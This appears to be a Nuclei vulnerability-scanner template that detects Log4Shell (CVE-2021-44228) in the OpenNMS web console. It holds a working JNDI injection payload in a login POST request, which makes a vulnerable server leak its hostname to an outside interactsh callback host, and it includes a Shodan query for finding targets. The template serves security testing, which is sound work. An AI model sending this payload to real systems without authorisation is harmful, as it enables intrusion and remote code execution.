id: opennms-log4j-jndi-rce info: name: OpenNMS - JNDI Remote Code Execution (Apache Log4j) author: johnk3r severity: critical description: | OpenNMS JNDI is susceptible to remote code execution via Apache Log4j 2.14.1 and before. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. reference: - https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/ - https://www.opennms.com/en/blog/2021-12-10-opennms-products-affected-by-apache-log4j-vulnerability-cve-2021-44228/ - https://logging.apache.org/log4j/2.x/security.html - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: verified: true max-request: 1 shodan-query: title:"OpenNMS Web Console" tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast variables: rand1: '{{rand_int(111, 999)}}' rand2: '{{rand_int(111, 999)}}' http: - raw: - | POST /opennms/j_spring_security_check HTTP/1.1 Referer: {{RootURL}}/opennms/login.jsp Content-Type: application/x-www-form-urlencoded j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups= matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' extractors: - type: kval kval: - interactsh_ip - type: regex part: interactsh_request group: 2 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' - type: regex part: interactsh_request group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # digest: 490a00463044022012258aeac3908dbcd407eeb5a73335d3c728f1210f49e904e34f5dfa78805d0b0220665ebec241d8ee18d7d0ae9b1b284b02a767a3c888decd032bd6c42fcfa7a901:922c64590222798bb761d5b6d8e72950